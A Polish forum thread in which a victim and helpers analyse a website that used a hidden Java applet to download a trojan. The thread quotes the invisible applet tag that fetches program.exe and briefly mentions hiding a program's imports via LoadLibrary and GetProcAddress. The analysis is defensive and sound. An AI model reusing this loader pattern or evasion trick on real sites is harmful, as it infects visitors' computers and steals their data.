Proszę o pomoc w określeniu bezpieczeństwa strony.

morderuk

Użytkownik
Dołączył
Kwiecień 23, 2010
Posty
5
Witam, mam problem, ponieważ mam pewne podejrzenia co do pewnej strony na którą po wejściu i zaakceptowaniu aplikacji Java której rzekomo wymagała do funkcjonowania ( zarowno w Operze jak i Mozilli) utraciłem ważne dane na komputerze w ten sam dzień. Nie jestem pewien czy to rzeczywiście przez tą strone, dlatego chciałbym prosić o pomoc ludzi którzy się znają, aby określili czy strona rzeczywiście jest niebezpieczna na podstawie źródła lub czegokolwiek.

Strona to : http://www.rapidpunkty.pl

UWAGA ! Strona może być niebezpieczna i proszę na nią wchodzić TYLKO jeżeli pewni jesteście swoich umiejętności (jednak bez akceptacji Javy wątpie czy stanowi jakieś zagrożenie)

Bardzo proszę o pomoc.

@EDIT
Doszukałem się takiej komendy w zrodle strony, i jako ze nie znam sie na Javie prosze o wytlumaczenie co ona po kolei robi i co definiuje, bo mysle ze w tym sęk :

<applet width=0 height=0 code="Program.class" archive="program.jar">
<param name="program" value="http://www.rapidpunkty.pl/program.exe">

Takze przeczytalem troche o exploicie na podstawie luk w Javie, wiec tym bardziej..

@EDIT2
Rzeczywiscie pobralem ww. plik program.exe ze strony i jest to plik zainfekowany, myślę ze temat moze byc zamkniety, chociaz chetnie chcialbym zobaczyc jakas dyskusje na ten temat.
 
Ostatnia edycja:

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
tak, na stronie jest trojan Packed.Win32.Krap.ag zajmujący według kasperskiego 15 miejsce: http://e-biznes.pl/2010/01/najpopularniejsze-szkodliwe-programy-grudnia-2009/

Po zaakceptowaniu javy pobierany zostaje program.exe - trojan.

a Tobie kolego zalecam zainstalowanie antywirusa:)

//edit: jak widzisz program exe pobierany jest na kompa, juz na oko widać ze w kodzie jest coś nie tak, nie trzeba wgl się na tym znac ;)
 

morderuk

Użytkownik
Dołączył
Kwiecień 23, 2010
Posty
5
No to jest to jak dla mnie bardzo szkodliwe, nigdy wczesniej nie slyszalem o czyms takim, wyglada na podstawy HTML i javy wykonanie takiego czegos, temat antyvirusa pozostawiam bez komentarza, aczkolwiek chcialbym zapytac czy jezeli plik bylby niewykrywalny to samo zaakceptowanie javy wywolalo by jakas reakcje ?? I czy dziala to tylko na niektore wersje javy ??
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
plik niewykrywalny.... hmmm w tych czasach wirusy są niewykrywalne max kilka dni ;) na pewno nie byleś pierwszy,a antywirusa warto mieć. byle co ja np mam Kasperskiego za kilka zł na allegro można kupić. porządny antywirus zawsze coś wykryje ;) jak nie z sygnatur to heurystyki itp,a chyba te kilka zł na rok można dac w celu bezpieczeństwa, pomysl :)
 

morderuk

Użytkownik
Dołączył
Kwiecień 23, 2010
Posty
5
Wiem wiem, wynika to chyba tylko z mojego lenistwa. A mam jeszcze takie pytanie techniczne. Poniewaz link do strony wyslal mi ktos przedstawiajacy sie pseudonimem mojego znajomego, tak wiec czy jest jakas opcja typu sprawdzenie samego pliku, gdzie wysyla logi, jak dziala ? I czy mozna sprawdzic jakie jest IP admina tej strony ?? Lub cokolwiek co moglo by mnie nakierowac ?? Jak mowie, gdybym sam z googli wszedl na ta strone olal byl to, ale sytuacja jest w moim przypadku nieco podejrzana i duzo by to pomoglo.
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
jasne, wszystko da się sprawdzić, ustaliś itp, jezeli coś utraciłeś na kompie mozesz takze zgłosic sprawe na policje ;) jest to normalne wlamanie i jest za to nawet więzienie a wiadomo Ty na pewno nie byles pierwszy ;)
 

cyber_pl

Użytkownik
Dołączył
Wrzesień 30, 2009
Posty
187
jest to kolejna produkcja w borland delphi:

Kod:
cyber@win9x:~/Pobrane$ strings ./program.exe | grep "elph"
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Delphi\Locales
Delphi Picture
Delphi Component
Delphi%.8X
cyber@win9x:~/Pobrane$

nic z tego ciekawego nie wyciagniesz, szkoda czasu zreszta.
 

cyber_pl

Użytkownik
Dołączył
Wrzesień 30, 2009
Posty
187
Moge wiedzieć w jaki sposob przegladnales kod zrodlowy pliku ?

W żaden, wyszukałem jedynie ciągów znaków zdefiniowanych w programie, te które widzisz dodaje kompilator Delphi Borlanda, nic szczególnego.
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
cyber tak spytam bo widze po Tobie znasz się na rzeczy, otwierając program w hexedytorze mozna odszukać nazwy funkcji w winapi, są to funkcje ktore zostały użyte w programie czy jest to cały modół windows.h? :) wiesz moze? :)
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
hmmm wlasnie ciekawi mnie to bo widocznie ten wirus korzysta z urozmaiconego jadłospisu funkcji :D
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Pewnie kozysta z komponentow a one kozystaja z wielu funkcji.
 

5.56

Użytkownik
Dołączył
Luty 1, 2010
Posty
102
@Legalnl:
Hexedytorem da radę,ale w ładniejszej postaci będzie w takich programach jak lordPE czy pe viewer(chodzi o "import table").
Wspomnę tylko,że w co bardziej profesjonalnych programach(asm,uhuhuh) może być pewien trik oparty na zasadzie,że każdy exe ma na starcie zaimportowaną kernel32.dll która ma takie funkcje jak loadlibrary() i GetProcAddress()...to po co właściwie imporotwać jakiekolwiek inne? :D(po resztę informacji odsyłam do googli)
@Temat(żeby nie było że offtop):
taa,pewnie wirus :/
zapuść formata,powinno pomuc
 

White/

Użytkownik
Dołączył
Listopad 23, 2010
Posty
1
Witam, jestem kolejną osobą która dała się na to nabrać. Dokladnie tak samo, link przyslała mi osoba która podawała sie za mojego znajomego. Mam nadzieję że za wszystko zapłacisz odpowiednią ceną hakerze
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
Do góry Bottom